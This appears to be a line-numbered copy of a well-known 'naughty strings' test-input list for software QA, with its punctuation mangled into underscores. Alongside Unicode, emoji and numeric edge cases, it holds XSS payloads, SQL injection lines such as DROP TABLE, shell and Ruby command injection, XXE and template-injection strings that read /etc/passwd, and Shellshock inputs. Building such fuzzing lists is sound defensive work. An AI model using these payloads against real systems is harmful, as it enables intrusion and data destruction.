3 # Strings which may be used elsewhere in code
27 # Strings which can be interpreted as numeric
47 9223372036854775808_-1
69 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
83 123456789012345678901234567890123456789
99 2.2250738585072011e-308
103 # ASCII punctuation.All of these characters may need to be escaped in some
104 # contexts. Divided into three groups based on (US-layout) keyboard position.
110 # Non-whitespace C0 controls_ U+0001 through U+0008, U+000E through U+001F
112 # Often forbidden to appear in various text-based file formats (e.g.XML)
113 # or reused for internal delimiters on the theory that they should never
115 # The next line may appear to be blank or mojibake in some viewers.
118 # Non-whitespace C1 controls_ U+0080 through U+0084 and U+0086 through U+009F.
119 # Commonly misinterpreted as additional graphic characters.
120 # The next line may appear to be blank, mojibake, or dingbats in some viewers.
123 # Whitespace_ all of the characters with category Zs, Zl, or Zp (in Unicode
124 # version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL)
125 # and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often
126 # treated as whitespace in some contexts.
127 # This file unfortunately cannot express strings containing
128 # U+0000, U+000A, or U+000D (NUL, LF, CR).
129 # The next line may appear to be blank or mojibake in some viewers.
130 # The next line may be flagged for _trailing whitespace_ in some viewers.
133 # Unicode additional control characters_ all of the characters with
134 # general category Cf (in Unicode 8.0.0).
135 # The next line may appear to be blank or mojibake in some viewers.
136 _________
138 # _Byte order marks_, U+FEFF and U+FFFE, each on its own line.
139 # The next two lines may appear to be blank or mojibake in some viewers.
145 # Strings which contain common unicode symbols (e.g.smart quotes)
156 ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя
159 # Unicode Subscript_Superscript_Accents
161 # Strings which contain unicode subscripts_superscripts; can cause rendering issues
166 ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้
170 # Strings which contain misplaced quotation marks; can cause encoding errors
184 # Two-Byte Characters
186 # Strings which contain two-byte characters_ can cause rendering issues or character-length issues
193 찦차를 타고 온 펲시맨과 쑛다리 똠방각하
198 # Strings which contain two-byte letters_ can cause issues with naïve UTF-16 capitalizers which think that 16 bits == 1 character
200 𐐜 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐙𐐊𐐡𐐝𐐓_𐐝𐐇𐐗𐐊𐐤𐐔 𐐒𐐋𐐗 𐐒𐐌 𐐜 𐐡𐐀𐐖𐐇𐐤𐐓𐐝 𐐱𐑂 𐑄 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐏𐐆𐐅𐐤𐐆𐐚𐐊𐐡𐐝𐐆𐐓𐐆
202 # Special Unicode Characters Union
204 # A super string recommended by VMware Inc. Globalization Team_ can effectively cause rendering issues or character-length issues to validate product globalization readiness.
206 # 表 CJK_UNIFIED_IDEOGRAPHS (U+8868)
207 # ポ KATAKANA LETTER PO (U+30DD)
208 # あ HIRAGANA LETTER A (U+3042)
209 # A LATIN CAPITAL LETTER A (U+0041)
210 # 鷗 CJK_UNIFIED_IDEOGRAPHS (U+9DD7)
211 # Œ LATIN SMALL LIGATURE OE (U+0153)
212 # é LATIN SMALL LETTER E WITH ACUTE (U+00E9)
213 # B FULLWIDTH LATIN CAPITAL LETTER B (U+FF22)
214 # 逍 CJK_UNIFIED_IDEOGRAPHS (U+900D)
215 # Ü LATIN SMALL LETTER U WITH DIAERESIS (U+00FC)
216 # ß LATIN SMALL LETTER SHARP S (U+00DF)
217 # ª FEMININE ORDINAL INDICATOR (U+00AA)
218 # ą LATIN SMALL LETTER A WITH OGONEK (U+0105)
219 # ñ LATIN SMALL LETTER N WITH TILDE (U+00F1)
220 # 丂 CJK_UNIFIED_IDEOGRAPHS (U+4E02)
221 # 㐀 CJK Ideograph Extension A, First (U+3400)
222 # 𠀀 CJK Ideograph Extension B, First (U+20000)
226 # Changing length when lowercased
228 # Characters which increase in length (2 to 3 bytes) when lowercased
229 # Credit_ https___twitter.com_jifa_status_625776454479970304
236 # Strings which consists of Japanese-style emoticons which are popular on the web
244 。・___・゜’( ☻ ω ☻ )。・___・゜’
253 # Strings which contain Emoji; should be the same behavior as two-byte characters, but not always
257 👨🦰 👨🏿🦰 👨🦱 👨🏿🦱 🦹🏿♂️
260 ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙
262 👨👩👦 👨👩👧👦 👨👨👦 👩👩👧 👨👦 👨👧👦 👩👦 👩👧👦
264 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟
266 # Regional Indicator Symbols
268 # Regional Indicator Symbols can be displayed differently across
269 # fonts, and have a number of special behaviors
277 # Strings which contain unicode numbers; if the code is localized, it should see the input as numeric
282 # Right-To-Left Strings
284 # Strings which contain text that should be rendered RTL if possible (e.g.Arabic, Hebrew)
286 ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر.
287 בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ
288 הָיְתָהtestالصفحات التّحول
291 مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ،
292 الكل في المجمو عة (5)
296 # The only unicode alphabet to use a space which isn't empty but should still act like a space.
303 # Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http___www.unicode.org_charts_PDF_U2000.pdf)
313 # Strings which contain _corrupted_ text. The corruption will not appear in non-HTML text, however. (via http___www.eeemo.net)
315 Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠.̨̹͈̣
316 ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖.̛̖̞̠̫̰
317 ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰.̟
318 ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹.͕
319 Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮
323 # Strings which contain unicode with an _upsidedown_ effect (via http___www.upsidedowntext.com)
325 ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥
330 # Strings which contain bold_italic_etc.versions of normal characters
332 The quick brown fox jumps over the lazy dog
333 𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠
334 𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌
335 𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈
336 𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰
337 𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘
338 𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐
339 ⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢
343 # Strings which attempt to invoke a benign script injection; shows vulnerability to XSS
345 script_alert(0)__script
346 <script>alert('1');<_script>
347 img src=x onerror=alert(2)
348 svg__script_123_1_alert(3)__script
349 script_alert(4)__script
350 '__script_alert(5)__script
351 script_alert(6)__script
352 script__script_alert(7)__script
353 script __ script _alert(8)_ _ script
354 onfocus=JaVaSCript_alert(9) autofocus
355 onfocus=JaVaSCript_alert(10) autofocus
356 ' onfocus=JaVaSCript_alert(11) autofocus
357 <script>alert(12)<_script>
358 sc_script_ript_alert(13)__sc__script_ript
359 script_alert(14)__script
364 src=JaVaSCript_prompt(19)
365 script_alert(20);__script x=
366 '__script_alert(21);__script x='
367 script_alert(22);__script x=
368 autofocus onkeyup=_javascript_alert(23)
369 ' autofocus onkeyup='javascript_alert(24)
370 script_x20type=_text_javascript__javascript_alert(25);__script
371 script_x3Etype=_text_javascript__javascript_alert(26);__script
372 script_x0Dtype=_text_javascript__javascript_alert(27);__script
373 script_x09type=_text_javascript__javascript_alert(28);__script
374 script_x0Ctype=_text_javascript__javascript_alert(29);__script
375 script_x2Ftype=_text_javascript__javascript_alert(30);__script
376 script_x0Atype=_text_javascript__javascript_alert(31);__script
377 '`____x3Cscript_javascript_alert(32)__script
378 '`____x00script_javascript_alert(33)__script
379 ABC_div style=_x_x3Aexpression(javascript_alert(34)__DEF
380 ABC_div style=_x_expression_x5C(javascript_alert(35)__DEF
381 ABC_div style=_x_expression_x00(javascript_alert(36)__DEF
382 ABC_div style=_x_exp_x00ression(javascript_alert(37)__DEF
383 ABC_div style=_x_exp_x5Cression(javascript_alert(38)__DEF
384 ABC_div style=_x__x0Aexpression(javascript_alert(39)__DEF
385 ABC_div style=_x__x09expression(javascript_alert(40)__DEF
386 ABC_div style=_x__xE3_x80_x80expression(javascript_alert(41)__DEF
387 ABC_div style=_x__xE2_x80_x84expression(javascript_alert(42)__DEF
388 ABC_div style=_x__xC2_xA0expression(javascript_alert(43)__DEF
389 ABC_div style=_x__xE2_x80_x80expression(javascript_alert(44)__DEF
390 ABC_div style=_x__xE2_x80_x8Aexpression(javascript_alert(45)__DEF
391 ABC_div style=_x__x0Dexpression(javascript_alert(46)__DEF
392 ABC_div style=_x__x0Cexpression(javascript_alert(47)__DEF
393 ABC_div style=_x__xE2_x80_x87expression(javascript_alert(48)__DEF
394 ABC_div style=_x__xEF_xBB_xBFexpression(javascript_alert(49)__DEF
395 ABC_div style=_x__x20expression(javascript_alert(50)__DEF
396 ABC_div style=_x__xE2_x80_x88expression(javascript_alert(51)__DEF
397 ABC_div style=_x__x00expression(javascript_alert(52)__DEF
398 ABC_div style=_x__xE2_x80_x8Bexpression(javascript_alert(53)__DEF
399 ABC_div style=_x__xE2_x80_x86expression(javascript_alert(54)__DEF
400 ABC_div style=_x__xE2_x80_x85expression(javascript_alert(55)__DEF
401 ABC_div style=_x__xE2_x80_x82expression(javascript_alert(56)__DEF
402 ABC_div style=_x__x0Bexpression(javascript_alert(57)__DEF
403 ABC_div style=_x__xE2_x80_x81expression(javascript_alert(58)__DEF
404 ABC_div style=_x__xE2_x80_x83expression(javascript_alert(59)__DEF
405 ABC_div style=_x__xE2_x80_x89expression(javascript_alert(60)__DEF
406 a href=__x0Bjavascript_javascript_alert(61)_ id=_fuzzelement1__test__a
407 a href=__x0Fjavascript_javascript_alert(62)_ id=_fuzzelement1__test__a
408 a href=__xC2_xA0javascript_javascript_alert(63)_ id=_fuzzelement1__test__a
409 a href=__x05javascript_javascript_alert(64)_ id=_fuzzelement1__test__a
410 a href=__xE1_xA0_x8Ejavascript_javascript_alert(65)_ id=_fuzzelement1__test__a
411 a href=__x18javascript_javascript_alert(66)_ id=_fuzzelement1__test__a
412 a href=__x11javascript_javascript_alert(67)_ id=_fuzzelement1__test__a
413 a href=__xE2_x80_x88javascript_javascript_alert(68)_ id=_fuzzelement1__test__a
414 a href=__xE2_x80_x89javascript_javascript_alert(69)_ id=_fuzzelement1__test__a
415 a href=__xE2_x80_x80javascript_javascript_alert(70)_ id=_fuzzelement1__test__a
416 a href=__x17javascript_javascript_alert(71)_ id=_fuzzelement1__test__a
417 a href=__x03javascript_javascript_alert(72)_ id=_fuzzelement1__test__a
418 a href=__x0Ejavascript_javascript_alert(73)_ id=_fuzzelement1__test__a
419 a href=__x1Ajavascript_javascript_alert(74)_ id=_fuzzelement1__test__a
420 a href=__x00javascript_javascript_alert(75)_ id=_fuzzelement1__test__a
421 a href=__x10javascript_javascript_alert(76)_ id=_fuzzelement1__test__a
422 a href=__xE2_x80_x82javascript_javascript_alert(77)_ id=_fuzzelement1__test__a
423 a href=__x20javascript_javascript_alert(78)_ id=_fuzzelement1__test__a
424 a href=__x13javascript_javascript_alert(79)_ id=_fuzzelement1__test__a
425 a href=__x09javascript_javascript_alert(80)_ id=_fuzzelement1__test__a
426 a href=__xE2_x80_x8Ajavascript_javascript_alert(81)_ id=_fuzzelement1__test__a
427 a href=__x14javascript_javascript_alert(82)_ id=_fuzzelement1__test__a
428 a href=__x19javascript_javascript_alert(83)_ id=_fuzzelement1__test__a
429 a href=__xE2_x80_xAFjavascript_javascript_alert(84)_ id=_fuzzelement1__test__a
430 a href=__x1Fjavascript_javascript_alert(85)_ id=_fuzzelement1__test__a
431 a href=__xE2_x80_x81javascript_javascript_alert(86)_ id=_fuzzelement1__test__a
432 a href=__x1Djavascript_javascript_alert(87)_ id=_fuzzelement1__test__a
433 a href=__xE2_x80_x87javascript_javascript_alert(88)_ id=_fuzzelement1__test__a
434 a href=__x07javascript_javascript_alert(89)_ id=_fuzzelement1__test__a
435 a href=__xE1_x9A_x80javascript_javascript_alert(90)_ id=_fuzzelement1__test__a
436 a href=__xE2_x80_x83javascript_javascript_alert(91)_ id=_fuzzelement1__test__a
437 a href=__x04javascript_javascript_alert(92)_ id=_fuzzelement1__test__a
438 a href=__x01javascript_javascript_alert(93)_ id=_fuzzelement1__test__a
439 a href=__x08javascript_javascript_alert(94)_ id=_fuzzelement1__test__a
440 a href=__xE2_x80_x84javascript_javascript_alert(95)_ id=_fuzzelement1__test__a
441 a href=__xE2_x80_x86javascript_javascript_alert(96)_ id=_fuzzelement1__test__a
442 a href=__xE3_x80_x80javascript_javascript_alert(97)_ id=_fuzzelement1__test__a
443 a href=__x12javascript_javascript_alert(98)_ id=_fuzzelement1__test__a
444 a href=__x0Djavascript_javascript_alert(99)_ id=_fuzzelement1__test__a
445 a href=__x0Ajavascript_javascript_alert(100)_ id=_fuzzelement1__test__a
446 a href=__x0Cjavascript_javascript_alert(101)_ id=_fuzzelement1__test__a
447 a href=__x15javascript_javascript_alert(102)_ id=_fuzzelement1__test__a
448 a href=__xE2_x80_xA8javascript_javascript_alert(103)_ id=_fuzzelement1__test__a
449 a href=__x16javascript_javascript_alert(104)_ id=_fuzzelement1__test__a
450 a href=__x02javascript_javascript_alert(105)_ id=_fuzzelement1__test__a
451 a href=__x1Bjavascript_javascript_alert(106)_ id=_fuzzelement1__test__a
452 a href=__x06javascript_javascript_alert(107)_ id=_fuzzelement1__test__a
453 a href=__xE2_x80_xA9javascript_javascript_alert(108)_ id=_fuzzelement1__test__a
454 a href=__xE2_x80_x85javascript_javascript_alert(109)_ id=_fuzzelement1__test__a
455 a href=__x1Ejavascript_javascript_alert(110)_ id=_fuzzelement1__test__a
456 a href=__xE2_x81_x9Fjavascript_javascript_alert(111)_ id=_fuzzelement1__test__a
457 a href=__x1Cjavascript_javascript_alert(112)_ id=_fuzzelement1__test__a
458 a href=_javascript_x00_javascript_alert(113)_ id=_fuzzelement1__test__a
459 a href=_javascript_x3A_javascript_alert(114)_ id=_fuzzelement1__test__a
460 a href=_javascript_x09_javascript_alert(115)_ id=_fuzzelement1__test__a
461 a href=_javascript_x0D_javascript_alert(116)_ id=_fuzzelement1__test__a
462 a href=_javascript_x0A_javascript_alert(117)_ id=_fuzzelement1__test__a
463 `_'__img src=xxx_x _x0Aonerror=javascript_alert(118)
464 `_'__img src=xxx_x _x22onerror=javascript_alert(119)
465 `_'__img src=xxx_x _x0Bonerror=javascript_alert(120)
466 `_'__img src=xxx_x _x0Donerror=javascript_alert(121)
467 `_'__img src=xxx_x _x2Fonerror=javascript_alert(122)
468 `_'__img src=xxx_x _x09onerror=javascript_alert(123)
469 `_'__img src=xxx_x _x0Conerror=javascript_alert(124)
470 `_'__img src=xxx_x _x00onerror=javascript_alert(125)
471 `_'__img src=xxx_x _x27onerror=javascript_alert(126)
472 `_'__img src=xxx_x _x20onerror=javascript_alert(127)
473 `'__script__x3Bjavascript_alert(128)__script
474 `'__script__x0Djavascript_alert(129)__script
475 `'__script__xEF_xBB_xBFjavascript_alert(130)__script
476 `'__script__xE2_x80_x81javascript_alert(131)__script
477 `'__script__xE2_x80_x84javascript_alert(132)__script
478 `'__script__xE3_x80_x80javascript_alert(133)__script
479 `'__script__x09javascript_alert(134)__script
480 `'__script__xE2_x80_x89javascript_alert(135)__script
481 `'__script__xE2_x80_x85javascript_alert(136)__script
482 `'__script__xE2_x80_x88javascript_alert(137)__script
483 `'__script__x00javascript_alert(138)__script
484 `'__script__xE2_x80_xA8javascript_alert(139)__script
485 `'__script__xE2_x80_x8Ajavascript_alert(140)__script
486 `'__script__xE1_x9A_x80javascript_alert(141)__script
487 `'__script__x0Cjavascript_alert(142)__script
488 `'__script__x2Bjavascript_alert(143)__script
489 `'__script__xF0_x90_x96_x9Ajavascript_alert(144)__script
490 `'__script_-javascript_alert(145)__script
491 `'__script__x0Ajavascript_alert(146)__script
492 `'__script__xE2_x80_xAFjavascript_alert(147)__script
493 `'__script__x7Ejavascript_alert(148)__script
494 `'__script__xE2_x80_x87javascript_alert(149)__script
495 `'__script__xE2_x81_x9Fjavascript_alert(150)__script
496 `'__script__xE2_x80_xA9javascript_alert(151)__script
497 `'__script__xC2_x85javascript_alert(152)__script
498 `'__script__xEF_xBF_xAEjavascript_alert(153)__script
499 `'__script__xE2_x80_x83javascript_alert(154)__script
500 `'__script__xE2_x80_x8Bjavascript_alert(155)__script
501 `'__script__xEF_xBF_xBEjavascript_alert(156)__script
502 `'__script__xE2_x80_x80javascript_alert(157)__script
503 `'__script__x21javascript_alert(158)__script
504 `'__script__xE2_x80_x82javascript_alert(159)__script
505 `'__script__xE2_x80_x86javascript_alert(160)__script
506 `'__script__xE1_xA0_x8Ejavascript_alert(161)__script
507 `'__script__x0Bjavascript_alert(162)__script
508 `'__script__x20javascript_alert(163)__script
509 `'__script__xC2_xA0javascript_alert(164)__script
510 img _x00src=x onerror=_alert(165)
511 img _x47src=x onerror=_javascript_alert(166)
512 img _x11src=x onerror=_javascript_alert(167)
513 img _x12src=x onerror=_javascript_alert(168)
514 img_x47src=x onerror=_javascript_alert(169)
515 img_x10src=x onerror=_javascript_alert(170)
516 img_x13src=x onerror=_javascript_alert(171)
517 img_x32src=x onerror=_javascript_alert(172)
518 img_x47src=x onerror=_javascript_alert(173)
519 img_x11src=x onerror=_javascript_alert(174)
520 img _x47src=x onerror=_javascript_alert(175)
521 img _x34src=x onerror=_javascript_alert(176)
522 img _x39src=x onerror=_javascript_alert(177)
523 img _x00src=x onerror=_javascript_alert(178)
524 img src_x09=x onerror=_javascript_alert(179)
525 img src_x10=x onerror=_javascript_alert(180)
526 img src_x13=x onerror=_javascript_alert(181)
527 img src_x32=x onerror=_javascript_alert(182)
528 img src_x12=x onerror=_javascript_alert(183)
529 img src_x11=x onerror=_javascript_alert(184)
530 img src_x00=x onerror=_javascript_alert(185)
531 img src_x47=x onerror=_javascript_alert(186)
532 img src=x_x09onerror=_javascript_alert(187)
533 img src=x_x10onerror=_javascript_alert(188)
534 img src=x_x11onerror=_javascript_alert(189)
535 img src=x_x12onerror=_javascript_alert(190)
536 img src=x_x13onerror=_javascript_alert(191)
537 img[a][b][c]src[d]=x[e]onerror=[f]_alert(192)
538 img src=x onerror=_x09_javascript_alert(193)
539 img src=x onerror=_x10_javascript_alert(194)
540 img src=x onerror=_x11_javascript_alert(195)
541 img src=x onerror=_x12_javascript_alert(196)
542 img src=x onerror=_x32_javascript_alert(197)
543 img src=x onerror=_x00_javascript_alert(198)
544 a href=javascript_javascript_alert(199)_XXX__a
545 img src=_x` `_script_javascript_alert(200)__script__` `
546 img src onerror __ '_= alt=javascript_alert(201)
547 title onpropertychange=javascript_alert(202)___title__title title=
548 a href=http___foo.bar_#x=`y___a__img alt=_`__img src=x_x onerror=javascript_alert(203)___a
549 !--[if]__script_javascript_alert(204)__script
550 !--[if_img src=x onerror=javascript_alert(205)__]
551 script src=___%(jscript)s____script
552 script src=___%(jscript)s____script
553 IMG _____SCRIPT_alert(_206_)__SCRIPT
554 IMG SRC=javascript_alert(String.fromCharCode(50,48,55))
555 IMG SRC=# onmouseover=_alert('208')
556 IMG SRC= onmouseover=_alert('209')
557 IMG onmouseover=_alert('210')
558 IMG SRC=javascript:alert('211')
559 IMG SRC=javascript:alert('212')
560 IMG SRC=javascript:alert('213')
561 IMG SRC=_jav ascript_alert('214')
562 IMG SRC=_jav	ascript_alert('215')
563 IMG SRC=_jav
ascript_alert('216')
564 IMG SRC=_jav
ascript_alert('217')
565 perl -e 'print __IMG SRC=java_0script_alert(__218__)__;' _ out
566 IMG SRC=_  javascript_alert('219')
567 SCRIPT_XSS SRC=_http___ha.ckers.org_xss.js____SCRIPT
568 BODY onload!#$%&()_~+.@[___]^`=alert(_220_)
569 SCRIPT_SRC=_http___ha.ckers.org_xss.js____SCRIPT
570 SCRIPT_alert(_221_);_____SCRIPT
571 SCRIPT SRC=http___ha.ckers.org_xss.js__ B
572 SCRIPT SRC=__ha.ckers.org.j
573 IMG SRC=_javascript_alert('222')
574 iframe src=http___ha.ckers.org_scriptlet.html
576 u oncopy=alert()_ Copy me__u
577 i onwheel=alert(224)_ Scroll over me __i
580 textarea__script_alert(225)__script
584 # Strings which can cause a SQL injection if inputs are not sanitized
587 1'; DROP TABLE users-- 1
590 '; EXEC sp_MSForEachTable 'DROP TABLE _'
595 # Server Code Injection
597 # Strings which can cause user to run code on server as a privileged user (c.f. https___news.ycombinator.com_item_id=7665153)
604 dev_null; touch _tmp_blns.fail ; echo
605 `touch _tmp_blns.fail`
606 $(touch _tmp_blns.fail)
607 @{[system _touch _tmp_blns.fail_]}
609 # Command Injection (Ruby)
611 # Strings which can call system commands within Ruby_Rails applications
613 eval(_puts 'hello world'_)
616 Kernel.exec(_ls -al __)
620 # XXE Injection (XML)
622 # String which can reveal system files when parsed by a badly configured XML parser
624 xml version=_1.0_ encoding=_ISO-8859-1____!DOCTYPE foo [ _!ELEMENT foo ANY __!ENTITY xxe SYSTEM _file____etc_passwd_ _]__foo_&xxe;__foo
626 # Unwanted Interpolation
628 # Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just repr.
642 # Strings which can cause user to pull in files that should not be a part of a web server
647 # Known CVEs and Vulnerabilities
649 # Strings that test for known vulnerabilities
651 () { 0; }; touch _tmp_blns.shellshock1.fail
652 () { _; } __[$($())] { touch _tmp_blns.shellshock2.fail; }
656 # MSDOS_Windows Special Filenames
658 # Strings which are reserved characters in MSDOS_Windows
675 # IRC specific strings
677 # Strings that may occur on IRC clients that make security products freak out
679 DCC SEND STARTKEYLOGGER 0 0 0
683 # Innocuous strings which may be blocked by profanity filters (https___en.wikipedia.org_wiki_Scunthorpe_problem)
685 Scunthorpe General Hospital
686 Penistone Community Church
687 Lightwater Country Park
693 Craig Cockburn, Software Specialist
695 Dr. Herman I.Libshitz
698 medieval erection of parapets
710 # Strings which may cause human to reinterpret worldview
712 If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.
714 # Terminal escape codes
716 # Strings which punish the fools who use cat_type on this file
718 Roses are _[0;31mred_[0m, violets are _[0;34mblue.Hope you enjoy terminal hue
719 But now..._[20Cfor my greatest trick.[8m
720 The quic______k brown fo___________x.[Beeeep]
722 # iOS Vulnerabilities
724 # Strings which crashed iMessage in various versions of iOS
726 Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗
730 # Persian special characters
732 # This is a four characters string which includes Persian special characters (گچپژ)
738 # first one is supposed to raise _MemoryError_ exception
739 # second, obviously, prints contents of _etc_passwd
741 {% print 'x' _ 64 _ 1024__3 %}
742 {{ __.__class__.__mro__[2].__subclasses__()[40](__etc_passwd_).read() }}